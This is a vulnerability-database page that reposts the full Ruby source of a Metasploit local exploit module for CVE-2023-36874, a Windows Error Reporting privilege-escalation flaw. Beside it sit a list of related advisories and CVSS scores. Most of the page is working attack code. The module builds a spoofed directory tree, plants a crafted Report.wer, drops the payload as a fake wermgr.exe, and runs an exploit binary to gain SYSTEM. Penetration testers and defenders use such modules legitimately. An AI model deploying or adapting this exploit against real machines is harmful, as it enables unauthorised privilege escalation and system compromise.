Vulners
Lucene search
Microsoft Error Reporting Local Privilege Elevation
🗓️ 27 Sep 2023 00:00:00Reported by bwatters-r7, Filip Dragovic, Octoberfest7, metasploit.comType 
packetstorm🔗 packetstormsecurity.com👁 458 Views
| Reporter | Title | Published | Views | Family All 65 |
|---|---|---|---|---|
 | Microsoft Error Reporting Local Privilege Elevation Exploit | 27 Sep 202300:00 | – | zdt |
 | CVE-2023-36874 | 11 Jul 202300:00 | – | attackerkb |
 | Microsoft Patch Tuesday July 2023: Vulristics improvements, Office RCE, SFB SmartScreen and Outlook, EoP MSHTML and ERS, other RCEs | 28 Jul 202309:37 | – | avleonov |
 | The vulnerability of the Windows Error Reporting service in Windows operating systems allows a perpetrator to escalate their privileges. | 26 Jul 202300:00 | – | bdu_fstec |
 | CVE-2023-36874 | 11 Jul 202318:10 | – | circl |
 | Microsoft Windows Error Reporting Service Privilege Escalation Vulnerability | 11 Jul 202300:00 | – | cisa_kev |
 | CISA Adds Five Known Vulnerabilities to Catalog | 11 Jul 202312:00 | – | cisa |
 | Microsoft Windows Error Reporting 安全漏洞 | 11 Jul 202300:00 | – | cnnvd |
 | CVE-2023-36874 | 11 Jul 202317:03 | – | cve |
 | CVE-2023-36874 Windows Error Reporting Service Elevation of Privilege Vulnerability | 11 Jul 202317:03 | – | cvelist |
10
`##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking
include Msf::Post::Common
include Msf::Post::File
include Msf::Exploit::FileDropper
include Msf::Post::Windows::Priv
include Msf::Exploit::EXE
prepend Msf::Exploit::Remote::AutoCheck
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Microsoft Error Reporting Local Privilege Elevation Vulnerability',
'Description' => %q{
This module takes advantage of a bug in the way Windows error reporting opens the report
parser. If you open a report, Windows uses a relative path to locate the rendering program.
By creating a specific alternate directory structure, we can coerce Windows into opening an
arbitrary executable as SYSTEM.
If the current user is a local admin, the system will attempt impersonation and the exploit will
fail.
},
'License' => MSF_LICENSE,
'Author' => [
'Filip Dragović (Wh04m1001)', # PoC
'Octoberfest7', # PoC
'bwatters-r7' # msf module
],
'Platform' => ['win'],
'SessionTypes' => [ 'meterpreter', 'shell', 'powershell' ],
'Targets' => [
[ 'Automatic', { 'Arch' => [ ARCH_X64 ] } ]
],
'DefaultTarget' => 0,
'DisclosureDate' => '2023-07-11',
'References' => [
['CVE', '2023-36874'],
['URL', 'https://www.crowdstrike.com/blog/falcon-complete-zero-day-exploit-cve-2023-36874/'],
['URL', 'https://github.com/Wh04m1001/CVE-2023-36874'],
['URL', 'https://github.com/Octoberfest7/CVE-2023-36874_BOF']
],
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [ ARTIFACTS_ON_DISK ]
},
'Compat' => {
'Meterpreter' => {
'Commands' => %w[
stdapi_fs_delete_file
stdapi_sys_config_getenv
]
}
}
)
)
register_options([
OptString.new('EXPLOIT_NAME',
[true, 'The filename to use for the exploit binary (%RAND%.exe by default).', "#{Rex::Text.rand_text_alpha(6..14)}.exe"]),
OptString.new('REPORT_DIR',
[true, 'The Error Directory to use (%RAND% by default).', Rex::Text.rand_text_alpha(6..14).to_s]),
OptString.new('SHADOW_DRIVE',
[true, 'Directory to place in the home drive for pivot (%TEMP% by default).', Rex::Text.rand_text_alpha(6..14).to_s]),
OptInt.new('EXECUTE_DELAY',
[true, 'The number of seconds to delay between file upload and exploit launch', 3])
])
end
# When we pass the directory value to the mkdir method, the mkdir method
# passes the reference to the string containing the directory.
# We do a lot of string manipulation in this module, so this is a quick
# hack to make sure that despite what we do with the string after we create
# the directory, it is the actual directory we created that gets sent to
# the cleanup methods.
def clone_mkdir(dir)
mkdir(dir.clone)
end
def upload_error_report
wer_archive_dir = get_env('PROGRAMDATA')
vprint_status(wer_archive_dir)
wer_archive_dir << '\\Microsoft\\Windows\\WER\\ReportArchive'
report_dir = "#{wer_archive_dir}\\#{datastore['REPORT_DIR']}"
report_filename = "#{report_dir}\\Report.wer"
vprint_status("Creating #{report_dir}")
clone_mkdir(report_dir)
wer_report_data = exploit_data('CVE-2023-36874', 'Report.wer')
vprint_status("Writing Report to #{report_filename}")
write_file(report_filename, wer_report_data)
end
def build_shadow_archive_dir(shadow_base_dir)
wer_archive_dir = shadow_base_dir
clone_mkdir(wer_archive_dir)
wer_archive_dir << '\\ProgramData\\'
clone_mkdir(wer_archive_dir)
wer_archive_dir << 'Microsoft\\'
clone_mkdir(wer_archive_dir)
wer_archive_dir << 'Windows\\'
clone_mkdir(wer_archive_dir)
wer_archive_dir << 'WER\\'
clone_mkdir(wer_archive_dir)
wer_archive_dir << 'ReportArchive\\'
clone_mkdir(wer_archive_dir)
report_dir = "#{wer_archive_dir}#{datastore['REPORT_DIR']}"
clone_mkdir(report_dir)
return report_dir
end
def upload_shadow_report(shadow_archive_dir)
report_filename = "#{shadow_archive_dir}\\Report.wer"
wer_report_data = exploit_data('CVE-2023-36874', 'Report.wer')
vprint_status("Writing bad Report to #{report_filename}")
write_file(report_filename, wer_report_data)
end
def build_shadow_system32(shadow_base_dir)
shadow_win32 = "#{shadow_base_dir}\\system32"
vprint_status("Creating #{shadow_win32}")
clone_mkdir(shadow_win32)
return shadow_win32
end
def upload_payload(shadow_win32)
payload_bin = generate_payload_exe
payload_filename = "#{shadow_win32}\\wermgr.exe"
vprint_status("Writing payload to #{payload_filename}")
write_file(payload_filename, payload_bin)
end
def upload_execute_exploit(exploit_path, shadow_path, home_dir)
vprint_status("shadow_path = #{shadow_path}")
exploit_bin = exploit_data('CVE-2023-36874', 'CVE-2023-36874.exe')
write_file(exploit_path, exploit_bin)
sleep datastore['EXECUTE_DELAY']
vprint_status("Exploit uploaded to #{exploit_path}")
cmd = "#{exploit_path} #{shadow_path} #{home_dir} #{datastore['REPORT_DIR']}"
output = cmd_exec(cmd, nil, 30)
vprint_status(output)
end
def check
# This only appears to work on 22H2, but likely will work elsewhere if we figure out the function pointers.
version = get_version_info
vprint_status("OS version: #{version}")
return Exploit::CheckCode::Appears if version.build_number == Msf::WindowsVersion::Win10_22H2
return Exploit::CheckCode::Safe
end
def exploit
fail_with(Module::Failure::BadConfig, 'User cannot be local admin') if is_in_admin_group?
fail_with(Module::Failure::BadConfig, 'Already SYSTEM') if is_system?
shadow_dir = datastore['SHADOW_DRIVE']
home_dir = get_env('HOMEDRIVE')
shadow_path = "#{home_dir}\\#{shadow_dir}"
vprint_status("Shadow Path = #{shadow_path}")
upload_error_report
shadow_archive_dir = build_shadow_archive_dir(shadow_path.dup)
upload_shadow_report(shadow_archive_dir)
shadow_system32 = build_shadow_system32(shadow_path.dup)
upload_payload(shadow_system32)
sleep datastore['EXECUTE_DELAY']
exploit_path = "#{shadow_path}\\#{datastore['EXPLOIT_NAME']}"
exploit_path << '.exe' unless exploit_path[-4..] == '.exe'
if shadow_dir.length > 64
fail_with(Module::Failure::BadConfig, 'REPORT_DIR value too long')
end
upload_execute_exploit(exploit_path, shadow_dir, home_dir)
print_warning("Manual deletion of #{shadow_path} may be required")
end
end
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
27 Sep 2023 00:00Current
7.1High risk
Vulners AI Score7.1
CVSS 3.17.8
EPSS0.32309